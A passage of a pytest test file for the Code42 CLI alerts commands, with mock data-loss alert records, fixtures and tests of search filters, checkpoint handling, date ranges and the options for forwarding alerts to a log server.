1580450400.0\nCURSOR_TIMESTAMP = 1579500000.0\nALERT_SUMMARY_LIST = [{\"id\": i} for i in range(20)]\nALERT_DETAIL_RESULT = [\n {\n \"alerts\": [\n {\"id\": 1, \"createdAt\": \"2020-01-17\"},\n {\"id\": 11, \"createdAt\": \"2020-01-18\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 2, \"createdAt\": \"2020-01-19\"},\n {\"id\": 12, \"createdAt\": \"2020-01-20\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 3, \"createdAt\": \"2020-01-01\"},\n {\"id\": 13, \"createdAt\": \"2020-01-02\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 4, \"createdAt\": \"2020-01-03\"},\n {\"id\": 14, \"createdAt\": \"2020-01-04\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 5, \"createdAt\": \"2020-01-05\"},\n {\"id\": 15, \"createdAt\": \"2020-01-06\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 6, \"createdAt\": \"2020-01-07\"},\n {\"id\": 16, \"createdAt\": \"2020-01-08\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 7, \"createdAt\": \"2020-01-09\"},\n {\"id\": 17, \"createdAt\": \"2020-01-10\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 8, \"createdAt\": \"2020-01-11\"},\n {\"id\": 18, \"createdAt\": \"2020-01-12\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 9, \"createdAt\": \"2020-01-13\"},\n {\"id\": 19, \"createdAt\": \"2020-01-14\"},\n ]\n },\n {\n \"alerts\": [\n {\"id\": 10, \"createdAt\": \"2020-01-15\"},\n {\"id\": 20, \"createdAt\": \"2020-01-16\"},\n ]\n },\n]\nSORTED_ALERT_DETAILS = [\n {\"id\": 12, \"createdAt\": \"2020-01-20\"},\n {\"id\": 2, \"createdAt\": \"2020-01-19\"},\n {\"id\": 11, \"createdAt\": \"2020-01-18\"},\n {\"id\": 1, \"createdAt\": \"2020-01-17\"},\n {\"id\": 20, \"createdAt\": \"2020-01-16\"},\n {\"id\": 10, \"createdAt\": \"2020-01-15\"},\n {\"id\": 19, \"createdAt\": \"2020-01-14\"},\n {\"id\": 9, \"createdAt\": \"2020-01-13\"},\n {\"id\": 18, \"createdAt\": \"2020-01-12\"},\n {\"id\": 8, \"createdAt\": \"2020-01-11\"},\n {\"id\": 17, \"createdAt\": \"2020-01-10\"},\n {\"id\": 7, \"createdAt\": \"2020-01-09\"},\n {\"id\": 16, \"createdAt\": \"2020-01-08\"},\n {\"id\": 6, \"createdAt\": \"2020-01-07\"},\n {\"id\": 15, \"createdAt\": \"2020-01-06\"},\n {\"id\": 5, \"createdAt\": \"2020-01-05\"},\n {\"id\": 14, \"createdAt\": \"2020-01-04\"},\n {\"id\": 4, \"createdAt\": \"2020-01-03\"},\n {\"id\": 13, \"createdAt\": \"2020-01-02\"},\n {\"id\": 3, \"createdAt\": \"2020-01-01\"},\n]\nADVANCED_QUERY_VALUES = {\n \"state_1\": \"OPEN\",\n \"state_2\": \"PENDING\",\n \"state_3\": \"IN_PROGRESS\",\n \"actor\": \"test@example.com\",\n \"on_or_after\": \"2020-01-01T06:00:00.000000Z\",\n \"on_or_after_timestamp\": 1577858400.0,\n \"on_or_before\": \"2020-02-01T06:00:00.000000Z\",\n \"on_or_before_timestamp\": 1580536800.0,\n \"rule_id\": \"xyz123\",\n}\nADVANCED_QUERY_JSON = \"\"\"\n{{\n \"srtDirection\": \"DESC\",\n \"pgNum\": 0,\n \"pgSize\": 100,\n \"srtKey\": \"CreatedAt\",\n \"groups\": [\n {{\n \"filterClause\": \"OR\",\n \"filters\": [\n {{\n \"value\": \"{state_1}\",\n \"term\": \"state\",\n \"operator\": \"IS\"\n }},\n {{\n \"value\": \"{state_2}\",\n \"term\": \"state\",\n \"operator\": \"IS\"\n }},\n {{\n \"value\": \"{state_3}\",\n \"term\": \"state\",\n \"operator\": \"IS\"\n }}\n ]\n }},\n {{\n \"filterClause\": \"OR\",\n \"filters\": [\n {{\n \"value\": \"{actor}\",\n \"term\": \"actor\",\n \"operator\": \"CONTAINS\"\n }}\n ]\n }},\n {{\n \"filterClause\": \"AND\",\n \"filters\": [\n {{\n \"value\": \"{on_or_after}\",\n \"term\": \"createdAt\",\n \"operator\": \"ON_OR_AFTER\"\n }},\n {{\n \"value\": \"{on_or_before}\",\n \"term\": \"createdAt\",\n \"operator\": \"ON_OR_BEFORE\"\n }}\n ]\n }},\n {{\n \"filterClause\": \"OR\",\n \"filters\": [\n {{\n \"value\": \"{rule_id}\",\n \"term\": \"ruleId\",\n \"operator\": \"IS\"\n }}\n ]\n }}\n ],\n \"groupClause\": \"AND\"\n}}\"\"\".format(\n **ADVANCED_QUERY_VALUES\n)\nadvanced_query_incompat_test_params = pytest.mark.parametrize(\n \"arg\",\n [\n (\"--begin\", \"1d\"),\n (\"--end\", \"1d\"),\n (\"--severity\", \"HIGH\"),\n (\"--actor\", \"test\"),\n (\"--actor-contains\", \"test\"),\n (\"--exclude-actor\", \"test\"),\n (\"--exclude-actor-contains\", \"test\"),\n (\"--rule-name\", \"test\"),\n (\"--exclude-rule-name\", \"test\"),\n (\"--rule-id\", \"test\"),\n (\"--exclude-rule-id\", \"test\"),\n (\"--rule-type\", \"FedEndpointExfiltration\"),\n (\"--exclude-rule-type\", \"FedEndpointExfiltration\"),\n (\"--description\", \"test\"),\n (\"--state\", \"OPEN\"),\n ],\n)\nALERT_DETAILS_FULL_RESPONSE = {\n \"type$\": \"ALERT_DETAILS_RESPONSE\",\n \"alerts\": [\n {\n \"type$\": \"ALERT_DETAILS\",\n \"tenantId\": \"11111111-2222-3333-4444-55559a126666\",\n \"type\": \"FED_ENDPOINT_EXFILTRATION\",\n \"name\": \"Some Burp Suite Test Rule\",\n \"description\": \"Some Burp Rule\",\n \"actor\": \"neilwin0415@code42.com\",\n \"actorId\": \"1002844444570300000\",\n \"target\": \"N/A\",\n \"severity\": \"HIGH\",\n \"ruleId\": \"e9bfa082-4541-4432-aacd-d8b2ca074762\",\n \"ruleSource\": \"Alerting\",\n \"id\": \"TEST-ALERT-ID-123\",\n \"createdAt\": \"2021-04-23T21:18:59.2032940Z\",\n \"state\": \"PENDING\",\n \"stateLastModifiedBy\": \"test@example.com\",\n \"stateLastModifiedAt\": \"2021-04-26T12:37:30.4605390Z\",\n \"observations\": [\n {\n \"type$\": \"OBSERVATION\",\n \"id\": \"f561e556-a746-4db0-b99b-71546adf57c4\",\n \"observedAt\": \"2021-04-23T21:10:00.0000000Z\",\n \"type\": \"FedEndpointExfiltration\",\n \"data\": {\n \"type$\": \"OBSERVED_ENDPOINT_ACTIVITY\",\n \"id\": \"f561e556-a746-4db0-b99b-71546adf57c4\",\n \"sources\": [\"Endpoint\"],\n \"exposureTypes\": [\"ApplicationRead\"],\n \"firstActivityAt\": \"2021-04-23T21:10:00.0000000Z\",\n \"lastActivityAt\": \"2021-04-23T21:15:00.0000000Z\",\n \"fileCount\": 1,\n \"totalFileSize\": 8326,\n \"fileCategories\": [\n {\n \"type$\": \"OBSERVED_FILE_CATEGORY\",\n \"category\": \"Image\",\n \"fileCount\": 1,\n \"totalFileSize\": 8326,\n \"isSignificant\": False,\n }\n ],\n \"files\": [\n {\n \"type$\": \"OBSERVED_FILE\",\n \"eventId\": \"0_c4e43418-07d9-4a9f-a138-29f39a124d33_1002847122023325984_4b6d298c-8660-4cb8-b6d1-61d09a5c69ba_0\",\n \"path\": \"C:\\\\Users\\\\Test Testerson\\\\Downloads\",\n \"name\": \"mad cat - Copy.jpg\",\n \"category\": \"Image\",\n \"size\": 8326,\n }\n ],\n \"syncToServices\": [],\n \"sendingIpAddresses\": [\"174.20.92.47\"],\n \"appReadDetails\": [\n {\n \"type$\": \"APP_READ_DETAILS\",\n \"tabTitles\": [\n \"file.example.com - Super simple file sharing - Google Chrome\"\n ],\n \"tabUrl\": \"https://www.file.example.com/\",\n \"tabInfos\": [\n {\n \"type$\": \"TAB_INFO\",\n \"tabUrl\": \"https://www.file.example.com/\",\n \"tabTitle\": \"example - Super simple file sharing - Google Chrome\",\n }\n ],\n \"destinationCategory\": \"Uncategorized\",\n \"destinationName\": \"Uncategorized\",\n \"processName\": \"\\\\Device\\\\HarddiskVolume3\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n }\n ],\n },\n }\n ],\n \"note\": {\n \"type$\": \"NOTE\",\n \"id\": \"72f8cd62-5cb8-4896-947d-f07e17053eaf\",\n \"lastModifiedAt\": \"2021-04-26T12:37:30.4987600Z\",\n \"lastModifiedBy\": \"test@example.com\",\n \"message\": \"TEST-NOTE-CLI-UNIT-TESTS\",\n },\n }\n ],\n}\nsearch_and_send_to_test = get_mark_for_search_and_send_to(\"alerts\")\n\n\n@pytest.fixture\ndef alert_extractor(mocker):\n mock = mocker.patch(f\"{PRODUCT_NAME}.cmds.alerts._get_alert_extractor\")\n mock.return_value = mocker.MagicMock(spec=AlertExtractor)\n return mock.return_value\n\n\n@pytest.fixture\ndef alert_cursor_with_checkpoint(mocker):\n mock = mocker.patch(f\"{PRODUCT_NAME}.cmds.alerts._get_alert_cursor_store\")\n mock_cursor = mocker.MagicMock(spec=AlertCursorStore)\n mock_cursor.get.return_value = CURSOR_TIMESTAMP\n mock.return_value = mock_cursor\n mock.expected_timestamp = \"2020-01-20T06:00:00+00:00\"\n return mock\n\n\n@pytest.fixture\ndef alert_cursor_without_checkpoint(mocker):\n mock = mocker.patch(f\"{PRODUCT_NAME}.cmds.alerts._get_alert_cursor_store\")\n mock_cursor = mocker.MagicMock(spec=AlertCursorStore)\n mock_cursor.get.return_value = None\n mock.return_value = mock_cursor\n return mock\n\n\n@pytest.fixture\ndef begin_option(mocker):\n mock = mocker.patch(f\"{PRODUCT_NAME}.cmds.alerts.convert_datetime_to_timestamp\")\n mock.return_value = BEGIN_TIMESTAMP\n mock.expected_timestamp = \"2020-01-01T06:00:00.000000Z\"\n return mock\n\n\n@pytest.fixture\ndef alert_extract_func(mocker):\n return mocker.patch(f\"{PRODUCT_NAME}.cmds.alerts._extract\")\n\n\n@pytest.fixture\ndef send_to_logger_factory(mocker):\n return mocker.patch(\"code42cli.cmds.search._try_get_logger_for_server\")\n\n\n@pytest.fixture\ndef full_alert_details_response(mocker):\n return create_mock_response(mocker, data=ALERT_DETAILS_FULL_RESPONSE)\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_advanced_query_passed_as_json_string_builds_expected_query(\n cli_state, alert_extractor, runner, command\n):\n runner.invoke(\n cli, [*command, \"--advanced-query\", ADVANCED_QUERY_JSON], obj=cli_state,\n )\n passed_filter_groups = alert_extractor.extract.call_args[0]\n expected_actor_filter = f.Actor.contains(ADVANCED_QUERY_VALUES[\"actor\"])\n expected_actor_filter.filter_clause = \"OR\"\n expected_timestamp_filter = f.DateObserved.in_range(\n ADVANCED_QUERY_VALUES[\"on_or_after_timestamp\"],\n ADVANCED_QUERY_VALUES[\"on_or_before_timestamp\"],\n )\n expected_state_filter = f.AlertState.is_in(\n [\n ADVANCED_QUERY_VALUES[\"state_1\"],\n ADVANCED_QUERY_VALUES[\"state_2\"],\n ADVANCED_QUERY_VALUES[\"state_3\"],\n ]\n )\n expected_rule_id_filter = f.RuleId.eq(ADVANCED_QUERY_VALUES[\"rule_id\"])\n expected_rule_id_filter.filter_clause = \"OR\"\n assert expected_actor_filter in passed_filter_groups\n assert expected_timestamp_filter in passed_filter_groups\n assert expected_state_filter in passed_filter_groups\n assert expected_rule_id_filter in passed_filter_groups\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_without_advanced_query_uses_only_the_extract_method(\n cli_state, alert_extractor, runner, command\n):\n\n runner.invoke(cli, [*command, \"--begin\", \"1d\"], obj=cli_state)\n assert alert_extractor.extract.call_count == 1\n assert alert_extractor.extract_advanced.call_count == 0\n\n\n@advanced_query_incompat_test_params\ndef test_search_with_advanced_query_and_incompatible_argument_errors(\n arg, cli_state, runner\n):\n\n result = runner.invoke(\n cli,\n [\"alerts\", \"search\", \"--advanced-query\", ADVANCED_QUERY_JSON, *arg],\n obj=cli_state,\n )\n assert result.exit_code == 2\n assert f\"{arg[0]} can't be used with: --advanced-query\" in result.output\n\n\n@advanced_query_incompat_test_params\ndef test_send_to_with_advanced_query_and_incompatible_argument_errors(\n arg, cli_state, runner\n):\n\n result = runner.invoke(\n cli,\n [\"alerts\", \"send-to\", \"0.0.0.0\", \"--advanced-query\", ADVANCED_QUERY_JSON, *arg],\n obj=cli_state,\n )\n assert result.exit_code == 2\n assert f\"{arg[0]} can't be used with: --advanced-query\" in result.output\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_begin_and_end_dates_uses_expected_query(\n cli_state, alert_extractor, runner, command\n):\n begin_date = get_test_date_str(days_ago=89)\n end_date = get_test_date_str(days_ago=1)\n\n runner.invoke(\n cli, [*command, \"--begin\", begin_date, \"--end\", end_date], obj=cli_state,\n )\n filters = alert_extractor.extract.call_args[0][0]\n actual_begin = get_filter_value_from_json(filters, filter_index=0)\n expected_begin = f\"{begin_date}T00:00:00.000000Z\"\n actual_end = get_filter_value_from_json(filters, filter_index=1)\n expected_end = f\"{end_date}T23:59:59.999999Z\"\n assert actual_begin == expected_begin\n assert actual_end == expected_end\n\n\n@search_and_send_to_test\ndef test_search_when_given_begin_and_end_date_and_times_uses_expected_query(\n cli_state, alert_extractor, runner, command\n):\n begin_date = get_test_date_str(days_ago=89)\n end_date = get_test_date_str(days_ago=1)\n time = \"15:33:02\"\n runner.invoke(\n cli,\n [*command, \"--begin\", f\"{begin_date} {time}\", \"--end\", f\"{end_date} {time}\"],\n obj=cli_state,\n )\n filters = alert_extractor.extract.call_args[0][0]\n actual_begin = get_filter_value_from_json(filters, filter_index=0)\n expected_begin = f\"{begin_date}T{time}.000000Z\"\n actual_end = get_filter_value_from_json(filters, filter_index=1)\n expected_end = f\"{end_date}T{time}.000000Z\"\n assert actual_begin == expected_begin\n assert actual_end == expected_end\n\n\n@search_and_send_to_test\ndef test_search_when_given_begin_date_and_time_without_seconds_uses_expected_query(\n cli_state, alert_extractor, runner, command\n):\n date = get_test_date_str(days_ago=89)\n time = \"15:33\"\n runner.invoke(cli, [*command, \"--begin\", f\"{date} {time}\"], obj=cli_state)\n actual = get_filter_value_from_json(\n alert_extractor.extract.call_args[0][0], filter_index=0\n )\n expected = f\"{date}T{time}:00.000000Z\"\n assert actual == expected\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_end_date_and_time_uses_expected_query(\n cli_state, alert_extractor, runner, command\n):\n begin_date = get_test_date_str(days_ago=10)\n end_date = get_test_date_str(days_ago=1)\n time = \"15:33\"\n runner.invoke(\n cli,\n [*command, \"--begin\", begin_date, \"--end\", f\"{end_date} {time}\"],\n obj=cli_state,\n )\n actual = get_filter_value_from_json(\n alert_extractor.extract.call_args[0][0], filter_index=1\n )\n expected = f\"{end_date}T{time}:00.000000Z\"\n assert actual == expected\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_begin_date_more_than_ninety_days_back_errors(\n cli_state, runner, command\n):\n begin_date = get_test_date_str(days_ago=91) + \" 12:51:00\"\n result = runner.invoke(cli, [*command, \"--begin\", begin_date], obj=cli_state)\n assert \"must be within 90 days\" in result.output\n assert result.exit_code == 2\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_begin_date_past_90_days_and_use_checkpoint_and_a_stored_cursor_exists_and_not_given_end_date_does_not_use_any_event_timestamp_filter(\n cli_state, alert_cursor_with_checkpoint, alert_extractor, runner, command\n):\n begin_date = get_test_date_str(days_ago=91) + \" 12:51:00\"\n runner.invoke(\n cli,\n [*command, \"--begin\", begin_date, \"--use-checkpoint\", \"test\"],\n obj=cli_state,\n )\n assert not filter_term_is_in_call_args(alert_extractor, f.DateObserved._term)\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_begin_date_and_not_use_checkpoint_and_cursor_exists_uses_begin_date(\n cli_state, alert_extractor, runner, command\n):\n begin_date = get_test_date_str(days_ago=1)\n runner.invoke(cli, [*command, \"--begin\", begin_date], obj=cli_state)\n actual_ts = get_filter_value_from_json(\n alert_extractor.extract.call_args[0][0], filter_index=0\n )\n expected_ts = f\"{begin_date}T00:00:00.000000Z\"\n assert actual_ts == expected_ts\n assert filter_term_is_in_call_args(alert_extractor, f.DateObserved._term)\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_end_date_is_before_begin_date_causes_exit(\n cli_state, runner, command\n):\n begin_date = get_test_date_str(days_ago=1)\n end_date = get_test_date_str(days_ago=3)\n result = runner.invoke(\n cli, [*command, \"--begin\", begin_date, \"--end\", end_date], obj=cli_state,\n )\n assert result.exit_code == 2\n assert \"'--begin': cannot be after --end date\" in result.output\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_with_only_begin_calls_extract_with_expected_filters(\n cli_state, alert_extractor, begin_option, runner, command\n):\n res = runner.invoke(cli, [*command, \"--begin\", \"1d\"], obj=cli_state)\n assert res.exit_code == 0\n assert (\n str(alert_extractor.extract.call_args[0][0])\n == '{\"filterClause\":\"AND\", \"filters\":[{\"operator\":\"ON_OR_AFTER\", \"term\":\"createdAt\", '\n f'\"value\":\"{begin_option.expected_timestamp}\"}}]}}'\n )\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_with_use_checkpoint_and_without_begin_and_without_stored_checkpoint_causes_expected_error(\n cli_state, alert_cursor_without_checkpoint, runner, command\n):\n result = runner.invoke(cli, [*command, \"--use-checkpoint\", \"test\"], obj=cli_state)\n assert result.exit_code == 2\n assert (\n \"--begin date is required for --use-checkpoint when no checkpoint exists yet.\"\n in result.output\n )\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_with_use_checkpoint_and_with_begin_and_without_checkpoint_calls_extract_with_begin_date(\n cli_state,\n alert_extractor,\n begin_option,\n alert_cursor_without_checkpoint,\n runner,\n command,\n):\n res = runner.invoke(\n cli, [*command, \"--use-checkpoint\", \"test\", \"--begin\", \"1d\"], obj=cli_state,\n )\n assert res.exit_code == 0\n assert len(alert_extractor.extract.call_args[0]) == 1\n assert begin_option.expected_timestamp in str(\n alert_extractor.extract.call_args[0][0]\n )\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_with_use_checkpoint_and_with_begin_and_with_stored_checkpoint_calls_extract_with_checkpoint_and_ignores_begin_arg(\n cli_state, alert_extractor, alert_cursor_with_checkpoint, runner, command\n):\n result = runner.invoke(\n cli, [*command, \"--use-checkpoint\", \"test\", \"--begin\", \"1h\"], obj=cli_state,\n )\n assert result.exit_code == 0\n assert alert_extractor.extract.call_count == 1\n assert (\n f\"checkpoint of {alert_cursor_with_checkpoint.expected_timestamp} exists\"\n in result.output\n )\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_actor_is_uses_username_filter(\n cli_state, alert_extractor, runner, command\n):\n actor_name = \"test.testerson\"\n runner.invoke(\n cli, [*command, \"--begin\", \"1h\", \"--actor\", actor_name], obj=cli_state\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.Actor.is_in([actor_name])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_exclude_actor_uses_actor_filter(\n cli_state, alert_extractor, runner, command\n):\n actor_name = \"test.testerson\"\n runner.invoke(\n cli, [*command, \"--begin\", \"1h\", \"--exclude-actor\", actor_name], obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.Actor.not_in([actor_name])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_rule_name_uses_rule_name_filter(\n cli_state, alert_extractor, runner, command\n):\n rule_name = \"departing employee\"\n runner.invoke(\n cli, [*command, \"--begin\", \"1h\", \"--rule-name\", rule_name], obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.RuleName.is_in([rule_name])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_exclude_rule_name_uses_rule_name_not_filter(\n cli_state, alert_extractor, runner, command\n):\n rule_name = \"departing employee\"\n runner.invoke(\n cli,\n [*command, \"--begin\", \"1h\", \"--exclude-rule-name\", rule_name],\n obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.RuleName.not_in([rule_name])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_rule_type_uses_rule_name_filter(\n cli_state, alert_extractor, runner, command\n):\n rule_type = \"FedEndpointExfiltration\"\n runner.invoke(\n cli, [*command, \"--begin\", \"1h\", \"--rule-type\", rule_type], obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.RuleType.is_in([rule_type])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_exclude_rule_type_uses_rule_name_not_filter(\n cli_state, alert_extractor, runner, command\n):\n rule_type = \"FedEndpointExfiltration\"\n runner.invoke(\n cli,\n [*command, \"--begin\", \"1h\", \"--exclude-rule-type\", rule_type],\n obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.RuleType.not_in([rule_type])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_rule_id_uses_rule_name_filter(\n cli_state, alert_extractor, runner, command\n):\n rule_id = \"departing employee\"\n runner.invoke(cli, [*command, \"--begin\", \"1h\", \"--rule-id\", rule_id], obj=cli_state)\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.RuleId.is_in([rule_id])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_exclude_rule_id_uses_rule_name_not_filter(\n cli_state, alert_extractor, runner, command\n):\n rule_id = \"departing employee\"\n runner.invoke(\n cli, [*command, \"--begin\", \"1h\", \"--exclude-rule-id\", rule_id], obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.RuleId.not_in([rule_id])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_description_uses_description_filter(\n cli_state, alert_extractor, runner, command\n):\n description = \"test description\"\n runner.invoke(\n cli, [*command, \"--begin\", \"1h\", \"--description\", description], obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.Description.contains(description)) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_given_multiple_search_args_uses_expected_filters(\n cli_state, alert_extractor, runner, command\n):\n actor = \"test.testerson@example.com\"\n exclude_actor = \"flag.flagerson@example.com\"\n rule_name = \"departing employee\"\n\n runner.invoke(\n cli,\n [\n *command,\n \"--begin\",\n \"1h\",\n \"--actor\",\n actor,\n \"--exclude-actor\",\n exclude_actor,\n \"--rule-name\",\n rule_name,\n ],\n obj=cli_state,\n )\n filter_strings = [str(arg) for arg in alert_extractor.extract.call_args[0]]\n assert str(f.Actor.is_in([actor])) in filter_strings\n assert str(f.Actor.not_in([exclude_actor])) in filter_strings\n assert str(f.RuleName.is_in([rule_name])) in filter_strings\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_with_or_query_flag_produces_expected_query(\n runner, cli_state, command\n):\n begin_date = get_test_date_str(days_ago=10)\n test_actor = \"test@example.com\"\n test_rule_type = \"FedEndpointExfiltration\"\n runner.invoke(\n cli,\n [\n *command,\n \"--or-query\",\n \"--begin\",\n begin_date,\n \"--actor\",\n test_actor,\n \"--rule-type\",\n test_rule_type,\n ],\n obj=cli_state,\n )\n expected_query = {\n \"tenantId\": None,\n \"groupClause\": \"AND\",\n \"groups\": [\n {\n \"filterClause\": \"AND\",\n \"filters\": [\n {\n \"operator\": \"ON_OR_AFTER\",\n \"term\": \"createdAt\",\n \"value\": f\"{begin_date}T00:00:00.000000Z\",\n }\n ],\n },\n {\n \"filterClause\": \"OR\",\n \"filters\": [\n {\"operator\": \"IS\", \"term\": \"actor\", \"value\": \"test@example.com\"},\n {\n \"operator\": \"IS\",\n \"term\": \"type\",\n \"value\": \"FedEndpointExfiltration\",\n },\n ],\n },\n ],\n \"pgNum\": 0,\n \"pgSize\": 500,\n \"srtDirection\": \"asc\",\n \"srtKey\": \"CreatedAt\",\n }\n actual_query = json.loads(str(cli_state.sdk.alerts.search.call_args[0][0]))\n assert actual_query == expected_query\n\n\n@search_and_send_to_test\ndef test_search_and_send_to_when_extraction_handles_error_expected_message_logged_and_printed_and_global_errored_flag_set(\n runner, cli_state, caplog, command\n):\n errors.ERRORED = False\n exception_msg = \"Test Exception\"\n cli_state.sdk.alerts.search.side_effect = Exception(exception_msg)\n with caplog.at_level(logging.ERROR):\n result = runner.invoke(cli, [*command, \"--begin\", \"1d\"], obj=cli_state)\n assert \"Error:\" in result.output\n assert exception_msg in result.output\n assert exception_msg in caplog.text\n assert errors.ERRORED\n\n\n@pytest.mark.parametrize(\n \"protocol\", (ServerProtocol.TLS_TCP, ServerProtocol.TLS_TCP, ServerProtocol.UDP)\n)\ndef test_send_to_allows_protocol_arg(cli_state, runner, protocol):\n res = runner.invoke(\n cli,\n [\"alerts\", \"send-to\", \"0.0.0.0\", \"--begin\", \"1d\", \"--protocol\", protocol],\n obj=cli_state,\n )\n assert res.exit_code == 0\n\n\ndef test_send_to_when_given_unknown_protocol_fails(cli_state, runner):\n res = runner.invoke(\n cli,\n [\"alerts\", \"send-to\", \"0.0.0.0\", \"--begin\", \"1d\", \"--protocol\", \"ATM\"],\n obj=cli_state,\n )\n assert res.exit_code\n\n\ndef test_send_to_certs_and_ignore_cert_validation_args_are_incompatible(\n cli_state, runner\n):\n res = runner.invoke(\n cli,\n [\n \"alerts\",\n \"send-to\",\n \"0.0.0.0\",\n \"--begin\",\n \"1d\",\n \"--protocol\",\n \"TLS-TCP\",\n \"--certs\",\n \"certs/file\",\n \"--ignore-cert-validation\",\n ],\n obj=cli_state,\n )\n assert \"Error: --ignore-cert-validation can't be used with: --certs\" in res.output\n\n\ndef test_send_to_creates_expected_logger(cli_state, runner, send_to_logger_factory):\n runner.invoke(\n cli,\n [\n \"alerts\",\n \"send-to\",\n \"0.0.0.0\",\n \"--begin\",\n \"1d\",\n \"--protocol\",\n \"TLS-TCP\",\n \"--certs\",\n \"certs/file\",\n ],\n obj=cli_state,\n )\n send_to_logger_factory.assert_called_once_with(\n \"0.0.0.0\", \"TLS-TCP\", \"RAW-JSON\", \"certs/file\"\n )\n\n\ndef test_send_to_when_given_ignore_cert_validation_uses_certs_equal_to_ignore_str(\n cli_state, runner, send_to_logger_factory\n):\n runner.invoke(\n cli,\n [\n \"alerts\",\n \"send-to\",\n \"0.0.0.0\",\n \"--begin\",\n \"1d\",\n \"--protocol\",\n \"TLS-TCP\",\n \"--ignore-cert-validation\",\n ],\n obj=cli_state,\n )\n send_to_logger_factory.assert_called_once_with(\n \"0.0.0.0\", \"TLS-TCP\", \"RAW-JSON\", \"ignore\"\n )\n\n\n@pytest.mark.parametrize(\"protocol\", (ServerProtocol.UDP, ServerProtocol.TCP))\ndef test_send_to_when_given_ignore_cert_validation_with_non_tls_protocol_fails_expectedly(\n cli_state, runner, protocol\n):\n res = runner.invoke(\n cli,\n [\n \"alerts\",\n \"send-to\",\n \"0.0.0.0\",\n \"--begin\",\n \"1d\",\n \"--protocol\",\n protocol,\n \"--ignore-cert-validation\",\n ],\n obj=cli_state,\n )\n assert (\n \"'--ignore-cert-validation' can only be used with '--protocol TLS-TCP'\"\n in res.output\n )\n\n\n@pytest.mark.parametrize(\"protocol\", (ServerProtocol.UDP, ServerProtocol.TCP))\ndef test_send_to_when_given_certs_with_non_tls_protocol_fails_expectedly(\n cli_state, runner, protocol\n):\n res = runner.invoke(\n cli,\n [\n \"alerts\",\n \"send-to\",\n \"0.0.0.0\",\n \"--begin\",\n \"1d\",\n \"--protocol\",\n protocol,\n \"--certs\",\n \"certs.pem\",\n ],\n obj=cli_state,\n )\n assert \"'--certs' can only be used with '--protocol TLS-TCP'\" in res.output\n\n\ndef test_get_alert_details_batches_results_according_to_batch_size(sdk):\n extraction._ALERT_DETAIL_BATCH_SIZE = 2\n sdk.alerts.get_details.side_effect = ALERT_DETAIL_RESULT\n extraction._get_alert_details(sdk, ALERT_SUMMARY_LIST)\n assert sdk.alerts.get_details.call_count == 10\n\n\ndef test_get_alert_details_sorts_results_by_date(sdk):\n extraction._ALERT_DETAIL_BATCH_SIZE = 2\n sdk.alerts.get_details.side_effect = ALERT_DETAIL_RESULT\n results = extraction._get_alert_details(sdk, ALERT_SUMMARY_LIST)\n assert results == SORTED_ALERT_DETAILS\n\n\ndef test_show_outputs_expected_headers(cli_state, runner, full_alert_details_response):\n cli_state.sdk.alerts.get_details.return_value = full_alert_details_response\n result = runner.invoke(cli, [\"alerts\", \"show\", \"TEST-ALERT-ID\"], obj=cli_state)\n assert \"Id\" in result.output\n assert \"RuleName\" in result.output\n assert \"Username\" in result.output\n assert \"ObservedDate\" in result.output\n assert \"State\" in result.output\n assert \"Severity\" in result.output\n assert \"Description\" in result.output\n\n\ndef test_show_outputs_expected_values(cli_state, runner, full_alert_details_response):\n cli_state.sdk.alerts.get_details.return_value = full_alert_details_response\n result = runner.invoke(cli, [\"alerts\", \"show\", \"TEST-ALERT-ID\"], obj=cli_state)\n # Values found in ALERT_DETAILS_FULL_RESPONSE.\n assert \"TEST-ALERT-ID-123\" in result.output\n assert \"Some Burp Suite Test Rule\" in result.output\n assert \"neilwin0415@code42.com\" in result.output\n assert \"2021-04-23T21:18:59.2032940Z\" in result.output\n assert \"PENDING\" in result.output\n assert \"HIGH\" in result.output\n 